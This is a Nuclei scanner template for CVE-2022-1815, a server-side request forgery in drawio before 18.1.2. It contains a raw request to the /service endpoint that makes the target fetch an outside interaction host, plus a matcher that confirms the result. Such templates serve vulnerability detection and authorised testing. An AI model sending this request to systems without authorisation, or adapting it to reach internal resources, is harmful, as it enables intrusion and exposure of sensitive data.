nuclei-templates/cves/2022/CVE-2022-1815.yaml

35 lines
1.1 KiB
YAML

id: CVE-2022-1815
info:
name: Drawio < 18.1.2 - Server Side Request Forgery
author: amit-jd
severity: high
description: |
SSRF in /service endpoint in jgraph/drawio prior to 18.1.2. Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.1.2.
reference:
- https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1815
- https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f
- https://github.com/jgraph/drawio/commit/c287bef9101d024b1fd59d55ecd530f25000f9d8
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-1815
cwe-id: CWE-918
metadata:
verified: "true"
tags: huntr,cve,cve2022,drawio,ssrf,oast,oss,jgraph
requests:
- raw:
- |
GET /service/0/test.oast.me HTTP/2
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "contains(body, 'Interactsh Server')"
- status_code == 200
condition: and